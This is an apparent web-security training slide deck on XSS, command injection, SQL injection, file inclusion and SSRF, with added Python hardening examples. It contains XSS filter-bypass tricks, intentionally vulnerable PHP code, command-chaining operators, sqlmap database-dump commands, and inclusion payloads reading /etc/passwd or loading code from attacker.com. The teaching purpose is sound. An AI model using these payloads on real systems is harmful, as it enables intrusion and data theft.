Web Security 2

Uploaded by monibhushan.03

WEB SECURITY
CROSS-SITE SCRIPTING CONTINUED
How to Exploit?

Find parameter
Find Input field
Check for injection
Check the context
Attempt to exploit
XSS CONTINUED
What if the <script> tag is blocked in the code?

We can use <sCripT>. Sometimes developers block the <script> tag, thinking that if an attacker can't use the <script> tag, it will prevent XSS. But we can still use <sCripT>, as the server will process it as <script>.
XSS CONTINUED
What if alert is blocked in the code?

We can use prompt instead.

XSS CONTINUED
What if <script>, prompt and alert are all blocked in the code?

We can nest the blocked keyword inside itself, for example <scrscriptipt> and alealertrt(). Whenever the backend detects a blocked keyword it removes it, but only in a single pass: stripping the inner "script" from <scrscriptipt> leaves <script>. The same applies to alert.
XSS CONTINUED
XSS in Error Messages

Sometimes error messages are shown in a parameter. If the parameter is not sanitized against user input, we can inject there.
XSS CONTINUED
XSS in Header

Sometimes error messages are shown in parameters. If the parameter is not sanitized against user input, we can inject there.

Have you ever noticed SQL error messages on a webpage? Do the values reflected in the error message correspond to the reason for the error?
XSS CONTINUED
XSS in File Upload

This can be done in two ways. Sometimes the webpage prints the file name after it has been uploaded, for example: File 'xyz' has been uploaded successfully.

Sometimes the website reads the EXIF data of a file. We can inject there.
XSS CONTINUED
VAPT Test Cases

TEST CASE 1: REFLECTED ERROR MESSAGE
TEST CASE 2: USER INPUT RETURNED WITHOUT FILTERING
TEST CASE 3: XSS VIA FILE UPLOAD
TEST CASE 4: XSS THROUGH SVG

More Readings:

https://noobsec.notion.site/Introduction-to-XSS-By-Mehedi-Hasan-42a1a052ec80430fa7d31358f04a9fae?pvs=4
https://noobsec.notion.site/XSS-writeup-by-Mehedi-Hasan-509e4e90d90747869d589e41f6b52d27?pvs=4
XSS CONTINUED
Code Review

Code Review 1

<?php include 'includes/header.php';?>
<?php include 'includes/navbar.php';?>
<?php
// If no "status" parameter is present, redirect back to this page with status=hello.
if(isset($_GET['status'])) {
} else {
    header('Location:'.$_SERVER['PHP_SELF'].'?'.'status=hello');
    die;
}
?>
<?php
echo "<br>Value : ";
if(isset($_GET['status'])) {
    $status = $_GET['status'];
    // Sink: the raw query-string value is echoed into the page without any encoding.
    echo $status;
}
?>
<?php include 'includes/footer.php';?>

Code Review 2

<?php include 'includes/header.php';?>
<?php include 'includes/navbar.php';?>
<?php
// If no "welcome" parameter is present, redirect with welcome=Welcome.
if(!isset($_GET['welcome'])) {
    header('Location: 4.php?welcome=Welcome');
}
?>
<?php
if(isset($_GET['welcome'])) {
    $welcome = $_GET['welcome'];
    // Blocklist filter: each keyword is removed in one case-sensitive pass; nothing is encoded.
    $welcome = preg_replace('/script/', '', $welcome);
    $welcome = preg_replace('/img/', '', $welcome);
    $welcome = preg_replace('/alert/', '', $welcome);
    $welcome = preg_replace('/prompt/', '', $welcome);
    // Sink: the filtered value is echoed into the page.
    echo $welcome;
}
?>
<?php include 'includes/footer.php';?>
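Added example (Python, not the course's PHP): a re-implementation of the Code Review 2 filter that makes the earlier slides' point concrete, showing why stripping each keyword once and echoing the result fails for the nested and mixed-case inputs, next to an output-encoding fix. Function names are my own.

```python
import html
import re

# Blocklist copied from the Code Review 2 sample above.
BLOCKED_WORDS = ("script", "img", "alert", "prompt")


def flawed_filter(value):
    """Mimic the slide's preg_replace chain: each blocked word is deleted in
    one case-sensitive pass and nothing is encoded afterwards."""
    for word in BLOCKED_WORDS:
        value = re.sub(word, "", value)  # same as preg_replace('/word/', '', $x)
    return value


def render_unsafe(value):
    """Code Review 2 behaviour: the filtered value is echoed into the HTML body."""
    return "<br>Value : " + flawed_filter(value)


def render_safe(value):
    """Hardened form: entity-encode for the HTML body context (HTML encoding);
    quote=True also makes the value safe inside a quoted attribute."""
    return "<br>Value : " + html.escape(value, quote=True)


def contains_script_tag(rendered):
    """Detection check: does the rendered markup still contain a <script> start
    tag in any letter case? Browsers match tag names case-insensitively, so a
    filter that leaves <sCripT> untouched has removed nothing."""
    return re.search(r"<\s*script\b", rendered, re.IGNORECASE) is not None
```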
XSS CONTINUED
Impact and Prevention

Impact:

Account hijacking
Credentials stealing
Sensitive data exposure
Accessing the client computer
... and many more

Defense:

1. INPUT SANITIZATION
2. ATTRIBUTE ENCODING
3. IMPLEMENTING CSP
4. HTML ENCODING
COMMAND INJECTION
OS command injection is a web vulnerability that allows an attacker to execute arbitrary operating system (OS) commands on the server running the vulnerable application; often the application and all its data are completely compromised. It occurs when applications do not properly validate and sanitize the parameters they pass to shell functions such as system() or exec() to execute system commands.
COMMAND INJECTION
To exploit a command injection vulnerability, there are multiple ways to chain additional commands onto the original one:

command1 && command2 runs command2 only if command1 succeeds.
command1 || command2 runs command2 only if command1 fails.
command1 ; command2 runs command1 and then command2.
command1 | command2 runs command1 and sends its output to command2 as input.
COMMAND INJECTION TYPES
Error-based injection: when an attacker injects a command through an input parameter and the output of that command is displayed on the web page, it proves that the application is vulnerable to command injection.

Blind injection: the results of the injected commands are not displayed to the attacker and no error messages are returned. The attacker must use another technique (such as a time delay) to identify whether the command was really executed on the server.
COMMAND INJECTION
Steps to Exploit

Identify the input field or parameter
Understand the functionality
Try the ping method (time delay)
Use various operators to exploit OS command injection
COMMAND INJECTION
The following list compiles popular functions attacked during command injection:

C/C++: system, execlp, execvp, ShellExecute, _wsystem
Java: Runtime.exec
PHP: exec, eval
Perl: exec, open, eval
Python: exec, eval, execfile, input
VB: Shell, ShellExecuteForExplore, ShellExecute


COMMAND INJECTION
Possible parameters to look for:

daemon=, host=, upload=, to=, dir=, execute=, download=, log=, ip=, cli=, cmd=, path=, username=, uri=, url=

Commands to try

Windows: whoami, ver, ipconfig, tasklist, netstat -an
Linux: whoami, id, ifconfig / ip addr, uname -a, ps -ef
COMMAND INJECTION

Lab: security-vault.security-pedia.com
COMMAND INJECTION
Impact:

The impact of command injection can be devastating, allowing attackers to execute unauthorized commands with the same privileges as the vulnerable application or service. This can lead to data breaches, unauthorized access to sensitive information, manipulation or deletion of files, disruption of services, and even complete compromise of the affected system.

Defense:

Input Validation and Sanitization
Parameterized Queries
Least Privilege Principle
Input Validation on the Server and Client Side
Content Security Policy (CSP)
Web Application Firewalls (WAF)
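Added Python example, not part of the course material, tying the operator list above to the defense list: a string-built ping command (the slides' ping check) that a single operator in the input turns into two commands, beside the allowlist-plus-argv form that prevents it. The ping feature, the hostname pattern and the function names are assumptions.

```python
import re
import subprocess

# The four chaining operators listed on the slide, split the way a shell would.
SHELL_OPERATORS = re.compile(r"\s*(?:&&|\|\||;|\|)\s*")

# Allowlist for the hypothetical ping feature: a hostname or IPv4 literal only
# (dot-separated labels of letters, digits and hyphens; nothing else gets through).
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$"
)


def split_shell_commands(command_line):
    """Split a command line on &&, ||, ; and | to show how many separate commands
    a shell would run; empty fragments are dropped."""
    return [part for part in SHELL_OPERATORS.split(command_line) if part]


def is_valid_host(host):
    """Allowlist validation: True only for a plain hostname or IPv4 literal."""
    return HOSTNAME_RE.match(host) is not None


def build_ping_unsafe(host):
    """Vulnerable pattern from the slide: user input spliced into the string that
    would be handed to system()/exec(). The string is returned, never executed."""
    return "ping -c 1 " + host


def build_ping_safe(host):
    """Hardened form: validate first, then return an argv list. Passed to
    subprocess.run() without shell=True, each element is one literal argument,
    so an operator inside `host` can never start a second command."""
    if not is_valid_host(host):
        raise ValueError("rejected host value: %r" % host)
    return ["ping", "-c", "1", host]  # Linux ping syntax assumed


def run_ping(host, timeout=5):
    """Execute the hardened form and return the exit status; raises ValueError
    before anything runs if the host fails validation."""
    return subprocess.run(build_ping_safe(host), capture_output=True,
                          timeout=timeout).returncode
```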
SQL INJECTION
A SQL injection occurs when a malicious user attempts to pass input that changes the final SQL query sent by the web application to the database, enabling the user to perform other unintended SQL queries directly against the database.

There are many ways to accomplish this. To get a SQL injection to work, the attacker must first inject SQL code and then subvert the web application logic by changing the original query or executing a completely new one. First, the attacker has to inject code outside the expected user input limits, so it does not get executed as simple user input. In the most basic case, this is done by injecting a single quote (') or a double quote (") to escape the limits of user input and inject data directly into the SQL query.
SQL INJECTION
Mainly Three Types

Error Based: Error-based SQL injections obtain information about the database structure from error messages issued by the database server. In rare circumstances, an attacker may enumerate an entire database using only error-based SQL injection.

Union Based: Union-based SQL injections use the UNION SQL operator to aggregate the results of two or more SELECT queries into a single result, which is subsequently returned as part of the HTTP response.

Blind: Boolean-based SQL injection works by submitting a SQL query to the database and forcing the application to produce a different response depending on whether the query returns TRUE or FALSE.
SQL INJECTION
SQL Statements

Before jumping into SQLi, let's learn SQL:

SQL (Structured Query Language) is a feature-rich language used for querying databases; these SQL queries are better referred to as statements. We will learn some basic SQL queries.

Let's assume a users table:

Table: Users
id  username  password
1   admin     1234
2   tom       12345
3   jerry     123456

SELECT * FROM USERS;
id  username  password
1   admin     1234
2   tom       12345
3   jerry     123456

SELECT USERNAME, PASSWORD FROM USERS;
username  password
admin     1234
tom       12345
jerry     123456
SQL INJECTION
SQL Statements

SELECT * FROM USERS LIMIT 1;
id  username  password
1   admin     1234

select * from users where username = 'admin';
id  username  password
1   admin     1234

select * from users where username != 'admin';
id  username  password
2   tom       12345
3   jerry     123456

Let's assume another table:

Table: user_details
id  fullname      address
1   Mehedi Hasan  abc
2   Bruce Lee     xyz
3   Alex Nail     axy

select id, username from users union select fullname, address from user_details;
id  username  fullname      address
1   admin     Mehedi Hasan  abc
2   tom       Bruce Lee     xyz
3   jerry     Alex Nail     axy

Some other queries: INSERT, UPDATE, DELETE
SQL INJECTION
How to Detect?

https://noobsec.notion.site/SQLI-Notes-8cebcebce0394e31b66e96971c32cf02?pvs=4
SQLMAP

Scenario: Using SQLMap with a login page
Description: Capture the request with Burp Suite and save it in a file (request.txt). Execute SQLMap using the -r flag followed by the filename.
Example Command: sqlmap -r request.txt

Scenario: Crawling a page to find injections
Description: Execute SQLMap with the -u flag followed by the URL and --crawl=1 to enable crawling.
Example Command: sqlmap -u http://example.com --crawl=1

Scenario: Dumping a database or table
Description: Execute SQLMap with the -r flag followed by the filename, the -p flag specifying the parameter vulnerable to injection, --dbms to specify the database management system, --dump to dump data, -D to specify the database, and -T to specify the table.
Example Command: sqlmap -r request.txt -p username --dbms=mysql --dump -D Webapp -T Users

Scenario: Using a proxy
Description: Use the --proxy flag followed by the proxy server address to route requests through a proxy.
Example Command: sqlmap --proxy="x.x.x.x:yyyy"
SQLI LAB
SQL INJECTION
Authentication Bypass

Lab: https://juice-shop.herokuapp.com/
SQL INJECTION
Impact:

Successful exploitation allows attackers to read, tamper with, or modify data, execute administrative operations on databases, and potentially gain access to the operating system. Consequences include breaches of confidentiality and loss of integrity, jeopardizing sensitive data.

Defense:

Prevention measures are relatively easy to implement. Most cases of SQLi can be avoided by adopting frameworks that interact with the database and by using parameterized queries (also known as prepared statements) instead of string concatenation within the query.
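Added example (Python with sqlite3, not from the slides) that replays the Users table from the SQL Statements slides: the concatenated WHERE username = '...' query next to the parameterized version recommended above, showing what a single quote in the input does to each.

```python
import sqlite3

# Constructed copy of the slide's Users table (id, username, password).
USERS = [(1, "admin", "1234"), (2, "tom", "12345"), (3, "jerry", "123456")]


def make_db():
    """In-memory SQLite database holding the slide's Users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", USERS)
    return conn


def lookup_unsafe(conn, username):
    """Vulnerable pattern: the value is concatenated into the SQL text, so a
    quote in the input closes the literal and the rest is parsed as SQL."""
    query = "SELECT * FROM users WHERE username = '" + username + "'"
    return conn.execute(query).fetchall()


def lookup_safe(conn, username):
    """Prepared statement: the value travels separately from the query text and
    is always treated as data, quotes included (the defense recommended above)."""
    return conn.execute("SELECT * FROM users WHERE username = ?", (username,)).fetchall()


def probe(username):
    """Run both lookups on a fresh database. Returns (unsafe, safe), where unsafe
    is the row list or the database error name when the concatenated query no
    longer parses, the very signal that error-based injection relies on."""
    conn = make_db()
    try:
        unsafe = lookup_unsafe(conn, username)
    except sqlite3.Error as exc:
        unsafe = type(exc).__name__
    safe = lookup_safe(conn, username)
    conn.close()
    return unsafe, safe
```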
FILE INCLUSION
File include vulnerabilities come from a lack of filtering when a user-controlled parameter is used as part of a file name in a call to an including function (require, require_once, include or include_once in PHP, for example). If the call to one of these methods is vulnerable, an attacker will be able to manipulate the function to load his own code. File include vulnerabilities can also be used as a directory traversal to read arbitrary files. However, if the included file contains an opening PHP tag, the file will be interpreted as PHP code.
FILE INCLUSION EXAMPLE
A simple example

A vulnerable web application has the endpoint /page?file=(unknown). When a request is made, the application dynamically includes the content of the file specified in the query parameter, for example with PHP's include() function: include($filename);

If an attacker modifies (unknown) to a path such as ../../etc/passwd or a remote URL such as http://attacker.com/malicious.php, they can read sensitive files or execute malicious code.
FILE INCLUSION
Impact and Prevention
Local file inclusion (LFI) vulnerabilities allow an attacker to read local files on the web server using malicious web requests, such as:

Web configuration files
Log files
Password files
Other sensitive system data

Defense:

Validate and sanitize user-supplied file paths.
Use whitelists for allowed files and directories.
Set strict file permissions to limit access.
Disable PHP allow_url_include.
Use absolute paths instead of relative paths.
Filter input to remove malicious characters.
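Added Python example, not from the course, implementing the whitelist, remote-URL and path checks listed above for the /page?file= endpoint from the previous slide. PAGES_DIR, the page names and the function names are hypothetical.

```python
import os
from urllib.parse import urlsplit

# Assumed layout for the slide's /page?file= endpoint: the directory holding the
# includable templates and the whitelist of names it may load (both hypothetical).
PAGES_DIR = "/var/www/app/pages"
ALLOWED_PAGES = {"home", "about", "contact"}


def is_contained(base_dir, candidate):
    """Directory-traversal check: True when `candidate` still lies inside
    `base_dir` once every '..' segment has been collapsed."""
    base = os.path.normpath(base_dir)
    return os.path.commonpath([base, os.path.normpath(candidate)]) == base


def classify_file_param(value):
    """Return 'accepted' or the reason the ?file= value must be refused.
    The checks mirror the slide's defenses: no remote URLs (what disabling
    allow_url_include enforces server-side), a whitelist of files, and an
    absolute-path containment check as defence in depth."""
    if urlsplit(value).scheme:
        return "rejected: remote URL or wrapper scheme"  # http://, https://, ...
    if "\x00" in value:
        return "rejected: null byte"
    if value not in ALLOWED_PAGES:
        return "rejected: not an allowlisted page"
    if not is_contained(PAGES_DIR, os.path.join(PAGES_DIR, value + ".php")):
        return "rejected: escapes the pages directory"
    return "accepted"


def resolve_include(value):
    """Absolute path the application may include, or ValueError explaining why
    not. Only this path, never the raw parameter, should reach include()."""
    verdict = classify_file_param(value)
    if verdict != "accepted":
        raise ValueError(verdict)
    return os.path.join(PAGES_DIR, value + ".php")
```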
SERVER SIDE REQUEST
FORGERY
Server-Side Request Forgery (SSRF) is a vulnerability that allows an attacker to induce the server-side application to make HTTP requests to an arbitrary domain of the attacker's choosing. It can be used by an attacker to interact with internal systems, possibly bypassing firewalls or accessing unauthorized data.

A SIMPLE EXAMPLE

A vulnerable web application uses a parameter to retrieve an image from a URL, i.e., /loadImage?url={imageURL}. An attacker can potentially change the {imageURL} to point to internal resources that should not be exposed, such as http://localhost/admin or http://internal-service/api/secrets.
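Added Python example (not part of the course material) of the check a /loadImage handler needs before fetching a user-supplied URL: restrict the scheme, resolve the host and refuse any address that is loopback, private or otherwise non-public, which covers both internal hosts named above. The resolver table and its hostnames are constructed.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}

# Constructed name-to-address table standing in for DNS so the example runs
# offline; images.example.com and internal-service are made-up names.
DEMO_DNS = {"images.example.com": ["93.184.216.34"], "localhost": ["127.0.0.1"],
            "internal-service": ["10.0.0.5"]}


def demo_resolver(hostname):
    return DEMO_DNS.get(hostname, [])


def dns_resolver(hostname):
    """Live lookup for real use; returns every address the name maps to."""
    return sorted({info[4][0] for info in socket.getaddrinfo(hostname, None)})


def is_public_address(address):
    """False for loopback, private (RFC 1918), link-local, reserved, multicast
    and unspecified addresses: nothing an image fetcher should ever reach."""
    ip = ipaddress.ip_address(address)
    return not (ip.is_loopback or ip.is_private or ip.is_link_local
                or ip.is_reserved or ip.is_multicast or ip.is_unspecified)


def validate_image_url(url, resolver=dns_resolver):
    """Decide whether /loadImage may fetch `url`: (True, "accepted") or (False, reason).
    Every address the host resolves to must be public. Caveat: resolve-then-fetch
    leaves a DNS rebinding window and redirects are not followed here, so pin the
    checked address when fetching and re-check any redirect target the same way."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, "scheme not allowed: %r" % parts.scheme
    if not parts.hostname:
        return False, "missing host"
    if parts.username or parts.password:
        return False, "credentials in URL not allowed"
    try:
        addresses = [str(ipaddress.ip_address(parts.hostname))]  # IP literal
    except ValueError:
        addresses = resolver(parts.hostname)                     # hostname
    if not addresses:
        return False, "host does not resolve"
    for address in addresses:
        if not is_public_address(address):
            return False, "host resolves to non-public address " + address
    return True, "accepted"
```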
THANK YOU
